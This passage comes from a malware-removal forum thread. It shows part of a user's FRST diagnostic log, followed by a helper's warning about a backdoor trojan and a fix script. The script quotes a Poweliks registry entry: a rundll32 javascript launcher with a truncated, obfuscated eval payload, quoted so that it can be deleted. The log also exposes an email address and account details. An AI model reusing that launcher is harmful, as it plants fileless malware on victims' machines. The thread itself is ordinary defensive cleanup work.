(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {1A7849E6-1F16-423E-A83F-FDAF7FAFD6A8} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)
Task: {1BAF563C-811E-46A7-B225-D6FDFACB1AD2} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2014-12-10] (Microsoft Corporation)
Task: {2B85D673-6E3D-46EC-B8DC-4F083D2B2384} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)
Task: {2E663FD9-BBE3-43AE-B4EA-80845CDE5B5B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-12-12] (Piriform Ltd)
Task: {48EFA195-E29A-4C0F-ABB7-3DEEF98C0040} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {56397E68-21A8-4A4E-A059-2B350F9FCF72} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)
Task: {563CD9A0-E107-4E7A-AC3D-E9104587679A} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)
Task: {63E580CD-D39D-44CC-9FB5-B0C6F41D9681} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-08-16] (ASUSTeK Computer Inc.)
Task: {669C6352-CD26-40AE-B1C2-723987C6699B} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft)
Task: {7359E772-DFCD-48B1-8F95-582AB5925168} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-3865632982-2122395147-3624827403-1002 => %localappdata%\Microsoft\SkyDrive\SkyDrive.exe
Task: {75063612-030A-4823-80D7-1A799C9BB591} - System32\Tasks\{11B805FB-1383-4263-8238-854558AFCD9B} => pcalua.exe -a "C:\Program Files (x86)\PlusVid\Uninstall.exe" -c /fcp=1
Task: {83598673-FABA-4D31-BF87-BF6D514D0988} - System32\Tasks\ASUS P4G => C:\Program Files\ASUS\P4G\BatteryLife.exe [2013-07-23] (ASUS)
Task: {83BCC0BF-274F-4B91-8965-0A028DE99864} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002Core => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe [2014-11-22] (Google Inc.)
Task: {A446CF32-1ED1-4479-93DE-F8B7350A5717} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-31] (Google Inc.)
Task: {AD24A6FB-93AE-4FC3-AA8B-A988EC3E9A49} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-10] (Adobe Systems Incorporated)
Task: {C01C32AD-ACAC-4549-BD14-DAF9C157C26D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-31] (Google Inc.)
Task: {C5224BF3-DC4D-4A54-9498-BC10594FD459} - System32\Tasks\ASUS InstantOn Config => C:\Program Files\ASUS\P4G\InsOnCfg.exe
Task: {CEF619D7-02AF-4962-8A79-76C665090150} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-wisdomslife@gmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {E7323537-7F16-4BAD-A0B0-B3705E371B6D} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-08-19] (ASUS)
Task: {F0916215-DF42-48EC-880B-9F65ABE63972} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-07-09] ()
Task: {F10B768D-D614-45A2-82B1-26815042B104} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe [2012-09-18] (ASUSTek Computer Inc.)
Task: {FF033E98-65C4-4CB0-AF1B-B1BC015E3885} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002UA => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe [2014-11-22] (Google Inc.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002Core.job => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002UA.job => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2012-12-19 00:10 - 2012-12-19 00:10 - 00072192 _____ () C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSWinService.exe
2014-03-03 17:44 - 2014-11-03 16:02 - 00116880 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2013-07-23 11:54 - 2013-07-23 11:54 - 00031360 _____ () C:\Program Files\ASUS\P4G\DevMng.dll
2013-12-03 20:21 - 2013-05-15 16:39 - 00463872 _____ () C:\Program Files (x86)\ASUS Gaming Mouse\hid.exe
2014-01-20 15:17 - 2014-01-20 15:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2013-12-03 20:10 - 2013-06-23 22:05 - 01199576 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2013-08-19 19:16 - 2013-08-19 19:16 - 00015440 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2013-08-16 12:03 - 2013-08-16 12:03 - 00023040 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\Microsoft:8S9cANgWAAQ40ucX3IQ1OC5zYd
AlternateDataStreams: C:\ProgramData\Microsoft:KhbmwaIj8jjBmPZ6ss5k5mUEsp
AlternateDataStreams: C:\ProgramData\Microsoft:zMy0bnceFNXIi7v4KfGcGQ
AlternateDataStreams: C:\ProgramData\Microsoft:ZWJJvkiCrYrhz0W4UN6LZ
AlternateDataStreams: C:\Users\JWT\Local Settings:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\Local Settings:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\SkyDrive:ms-properties
AlternateDataStreams: C:\Users\JWT\AppData\Local:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:j995bnd0fUf9E6DMrPOoXHhpj
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:SiOn268klR3MGhq2LXhtpM2gjnMPs
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:N9I8vNxKZhojc6M3zXLVp3
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:YeOaihpQEHsyBGdECvXiSS
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\86787522.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\86787522.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp.sys => ""="Driver"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\StartupFolder: => "Killer Network Manager.lnk"
HKLM\...\StartupApproved\Run: => "UMonit64"
HKLM\...\StartupApproved\Run32: => "BDRegion"
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-3865632982-2122395147-3624827403-500 - Administrator - Disabled)
D3E6B04356AF4AB5B1E5 (S-1-5-21-3865632982-2122395147-3624827403-1007 - Limited - Enabled)
Guest (S-1-5-21-3865632982-2122395147-3624827403-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3865632982-2122395147-3624827403-1009 - Limited - Enabled)
JWT (S-1-5-21-3865632982-2122395147-3624827403-1002 - Administrator - Enabled) => C:\Users\JWT
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (12/30/2014 07:20:18 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x521589ee
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x2b68
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:19:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158cae
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x144c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:19:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x521587cf
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x488
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:18:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158ba4
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000005
Fault offset: 0x00051156
Faulting process id: 0xb7c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158b32
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x2224
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52157bbc
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x1a04
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x54530124
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x1b64
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158cae
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x1cc0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x54530124
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x1e94
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (12/30/2014 07:17:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17416, time stamp: 0x52158bce
Faulting module name: ntdll.dll, version: 6.3.9600.17278, time stamp: 0x53eeb4a3
Exception code: 0xc0000374
Fault offset: 0x000debd8
Faulting process id: 0x20f4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
 
System errors:
=============
Error: (12/30/2014 07:22:04 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:21:32 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:20:56 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:18:50 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:18:19 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:17:49 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 07:17:18 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 01:08:10 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 01:07:39 AM) (Source: DCOM) (EventID: 10010) (User: WISDOM-G)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (12/30/2014 01:06:36 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Superfetch service terminated with the following error: 
%%1062
 
 
Microsoft Office Sessions:
=========================
Error: (12/30/2014 07:20:18 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17416521589eentdll.dll6.3.9600.1727853eeb4a3c0000374000debd82b6801d024335a4a23e6C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll98f8a60e-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:19:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158caentdll.dll6.3.9600.1727853eeb4a3c0000374000debd8144c01d0243332679fa5C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll70a8306c-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:19:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17416521587cfntdll.dll6.3.9600.1727853eeb4a3c0000374000debd848801d024332c2b4d51C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll6cbd1a8f-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:18:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158ba4ntdll.dll6.3.9600.1727853eeb4a3c000000500051156b7c01d02433051d9d79C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll4724cbe8-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158b32ntdll.dll6.3.9600.1727853eeb4a3c0000374000debd8222401d02433068899d0C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll44aec1de-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652157bbcntdll.dll6.3.9600.1727853eeb4a3c0000374000debd81a0401d02433068ae419C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll449d5935-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741654530124ntdll.dll6.3.9600.1727853eeb4a3c0000374000debd81b6401d02433068eb55aC:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll44905e8c-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158caentdll.dll6.3.9600.1727853eeb4a3c0000374000debd81cc001d024330682a53fC:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll448d50ba-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741654530124ntdll.dll6.3.9600.1727853eeb4a3c0000374000debd81e9401d0243305e615c5C:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll43eb85d0-9026-11e4-bf99-3423875a5d7d
 
Error: (12/30/2014 07:17:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.1741652158bcentdll.dll6.3.9600.1727853eeb4a3c0000374000debd820f401d0243305e1cf3fC:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\SYSTEM32\ntdll.dll43df4e91-9026-11e4-bf99-3423875a5d7d
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-12-29 22:15:36.920
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-29 22:15:36.769
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-29 22:08:07.194
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-29 22:08:07.062
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:45:12.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:45:12.402
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:34:58.781
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:34:58.378
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:34:57.651
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2014-12-14 14:34:57.267
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume6\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-4700HQ CPU @ 2.40GHz
Percentage of memory in use: 18%
Total physical RAM: 24525.5 MB
Available physical RAM: 19985.72 MB
Total Pagefile: 49101.5 MB
Available Pagefile: 42302.05 MB
Total Virtual: 131072 MB
Available Virtual: 131071.8 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:95.39 GB) (Free:0.22 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (STORAGE) (Fixed) (Total:465.75 GB) (Free:80.14 GB) NTFS
Drive e: (PRODUCTION FILES) (Fixed) (Total:465.76 GB) (Free:156.34 GB) NTFS
Drive f: (TECHNICAL) (Fixed) (Total:121.98 GB) (Free:97.76 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 47F72510)
 
Partition: GPT Partition Type.
 
========================================================
Disk: 1 (Size: 238.5 GB) (Disk ID: 5B98F280)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#9 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,015 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:09:16 PM

Posted 30 December 2014 - 03:25 PM

Hi WTTT3,
 
I must give you this warning:
 
Looking through your logs, one or more of your infections has been identified as a Backdoor Trojan. These threats have backdoor functionality which allows hackers to remotely control your computer, steal critical system information, and download and execute files.
 
I highly suggest you to disconnect this PC from the Internet immediately, and if possible use a clean computer and a flash drive to transfer the programs I request for you to run. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable. It would be wise to contact those same financial institutions to notify them of your situation.
 
Due to the nature of this trojan, your computer is very likely to be compromised. There is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:
 
How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall
 
We can still clean this machine, but I can't guarantee that it will be 100% secure afterwards. If you decide to continue cleaning this machine, follow on with the rest of the steps posted below. If you do not want to clean this machine, please let me know.
 
--------------

We need to run a fix with FRST:

  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter.
  • Copy and paste the script below in the notepad document:​
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
U3 swmidi; No ImagePath
AlternateDataStreams: C:\ProgramData\Microsoft:8S9cANgWAAQ40ucX3IQ1OC5zYd
AlternateDataStreams: C:\ProgramData\Microsoft:KhbmwaIj8jjBmPZ6ss5k5mUEsp
AlternateDataStreams: C:\ProgramData\Microsoft:zMy0bnceFNXIi7v4KfGcGQ
AlternateDataStreams: C:\ProgramData\Microsoft:ZWJJvkiCrYrhz0W4UN6LZ
AlternateDataStreams: C:\Users\JWT\Local Settings:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\Local Settings:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:j995bnd0fUf9E6DMrPOoXHhpj
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:SiOn268klR3MGhq2LXhtpM2gjnMPs
